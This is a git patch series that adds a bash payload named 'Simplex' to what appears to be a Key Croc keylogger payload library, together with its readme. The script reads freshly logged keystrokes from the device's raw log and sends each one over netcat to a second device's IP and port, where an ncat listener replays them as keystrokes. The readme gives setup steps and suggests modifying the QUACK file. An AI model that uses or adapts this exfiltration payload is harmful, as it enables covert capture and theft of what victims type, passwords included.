From c5241e4c781157402936fbb9960596065535b7c3 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:35:15 +0000 Subject: [PATCH 1/6] Remove placeholder --- payloads/library/exfiltration/placeholder | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 payloads/library/exfiltration/placeholder diff --git a/payloads/library/exfiltration/placeholder b/payloads/library/exfiltration/placeholder deleted file mode 100644 index e69de29..0000000 From c79f8e9b41b743c3784c15323a29734d76f5f92d Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:35:59 +0000 Subject: [PATCH 2/6] New Payload --- .../exfiltration/Multi_Net_Simplex/simplex | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 payloads/library/exfiltration/Multi_Net_Simplex/simplex diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/simplex b/payloads/library/exfiltration/Multi_Net_Simplex/simplex new file mode 100644 index 0000000..0bef253 --- /dev/null +++ b/payloads/library/exfiltration/Multi_Net_Simplex/simplex @@ -0,0 +1,62 @@ +#!/bin/bash +trap "kill 0" EXIT +########################################### +# Title: Simplex +# Author: Cribbit +# Description: Send key from one croc to another +# Target: Multi +########################################### + +MATCH croc_send +MATCH croc_listen + +LED SETUP +QUACK DELAY 200 +# variables +croc2=192.168.1.100 +port=8080 +# fixed variables +charlog=/root/loot/croc_char.log +rawlog=/root/loot/croc_raw.log +LED SPECIAL +# if listener set up netcat +if [[ "$LOOT" == "croc_listen" ]]; then + # Set up a command for nc to send to QUACK. + CMD="while true; do read i && QUACK KEYCODE \$i ; done" + # set nc to run in its own process + ncat -lvnk -p $port -c "$CMD" & + # give nc time to start + sleep 1 +fi + +LED ATTACK +# get the current line count +point=$(wc -l "$rawlog" | awk {'print $1'}) +# forever loop +while : +do + # if sender + if [[ "$LOOT" == "croc_send" ]]; then + # get the current line count + cnt=$(wc -l "$rawlog" | awk {'print $1'}) + # compaire the first with the secound + if [ "$cnt" -ne "$point" ]; then + # get the differnce + dif=$((cnt-point)) + while read -r line; do + key=${line:0:8} + echo $key -n | nc -w 2 $croc2 $port + done <<< "$(tail --lines $dif $rawlog)" + # reset count + point=$cnt + fi + fi + # should we exit + if tail -c 6 "$charlog" | grep -q 'exit'; then + sleep 1 + break; + fi +done + +LED FINISH +sleep 1 From 0651c50c30c53e159d0ade2bdbbe27dd63cf42f1 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:36:30 +0000 Subject: [PATCH 3/6] Read Me --- .../exfiltration/Multi_Net_Simplex/readme.md | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 payloads/library/exfiltration/Multi_Net_Simplex/readme.md diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md new file mode 100644 index 0000000..4a08fd4 --- /dev/null +++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md @@ -0,0 +1,45 @@ +# :phone: Simplex +- Author: Cribbit +- Version: 1.0 +- Target: Mutli OS +- Category: General +- Attackmode: None - Needs wifi connection + +## :mag: Match +croc_send +croc_listen + +## :book: Description +Sends keystrokes from one croc to another. + +This is a PoC basicly me playing with netcat. It's quite slow!! + +### Listener +On the listener use ‘croc_listen’ this will set up. This will create a netcat listener on the port and pass the incoming traffic to QUACK KEYCODE. + +### Sender +On the sending croc set the croc2 variable to the IP address of the listener croc i.e. `croc2=192.168.1.100` +Use ‘croc_send’ this will check the raw log and send new key press over nc to the other croc. + +### To stop +Type `exit` on the attached keyboards. + +### Note +Set the port variable to an unused port i.e. ‘port=8080’ + +This is a proof of concept. As there are some limitations due to the way the QUACK command works. +As by default, it releases all key(s) after it send a keycode. +So, you may have issues with command like `CTRL + C` it may do: +CTRL +CTRL + C +CTRL +If you hit CTRL then the C then let go of C then CTRL. +You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`. +Then look for the line `elif cmd == 'KEYCODE':` then 6'ish line down `hidg_write(elements,release_key)` +then change `release_key` to `False` or set the `release_key` variable to false `release_key = False` before the hidg_write line. + + +## :placard: Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | \ No newline at end of file From cd65a993659eee5c4252c466d6aef49328096f90 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:40:23 +0000 Subject: [PATCH 4/6] Update Readme --- payloads/library/exfiltration/Multi_Net_Simplex/readme.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md index 4a08fd4..6837f5b 100644 --- a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md +++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md @@ -2,7 +2,7 @@ - Author: Cribbit - Version: 1.0 - Target: Mutli OS -- Category: General +- Category: Exfiltration - Attackmode: None - Needs wifi connection ## :mag: Match @@ -30,11 +30,13 @@ Set the port variable to an unused port i.e. ‘port=8080’ This is a proof of concept. As there are some limitations due to the way the QUACK command works. As by default, it releases all key(s) after it send a keycode. So, you may have issues with command like `CTRL + C` it may do: +``` CTRL CTRL + C CTRL +``` If you hit CTRL then the C then let go of C then CTRL. -You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`. +You could fix this by modifying the QUACK file. If you look for the function `run_ducky_line(context, line, lang_file)`.
Then look for the line `elif cmd == 'KEYCODE':` then 6'ish line down `hidg_write(elements,release_key)` then change `release_key` to `False` or set the `release_key` variable to false `release_key = False` before the hidg_write line. From b76e04d0303d3e4504eb0eb909937c6c13313cb7 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Tue, 18 Mar 2025 19:42:19 +0000 Subject: [PATCH 5/6] Bad Spelling --- payloads/library/exfiltration/Multi_Net_Simplex/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md index 6837f5b..19ec0ac 100644 --- a/payloads/library/exfiltration/Multi_Net_Simplex/readme.md +++ b/payloads/library/exfiltration/Multi_Net_Simplex/readme.md @@ -12,7 +12,7 @@ croc_listen ## :book: Description Sends keystrokes from one croc to another. -This is a PoC basicly me playing with netcat. It's quite slow!! +This is a PoC basically me playing with netcat. It's quite slow!! ### Listener On the listener use ‘croc_listen’ this will set up. This will create a netcat listener on the port and pass the incoming traffic to QUACK KEYCODE. From 530577d112e50984d9d02105d09dae60eda78dc3 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Sun, 23 Mar 2025 13:12:21 +0000 Subject: [PATCH 6/6] txt 4 Peaks --- .../exfiltration/Multi_Net_Simplex/{simplex => simplex.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename payloads/library/exfiltration/Multi_Net_Simplex/{simplex => simplex.txt} (100%) diff --git a/payloads/library/exfiltration/Multi_Net_Simplex/simplex b/payloads/library/exfiltration/Multi_Net_Simplex/simplex.txt similarity index 100% rename from payloads/library/exfiltration/Multi_Net_Simplex/simplex rename to payloads/library/exfiltration/Multi_Net_Simplex/simplex.txt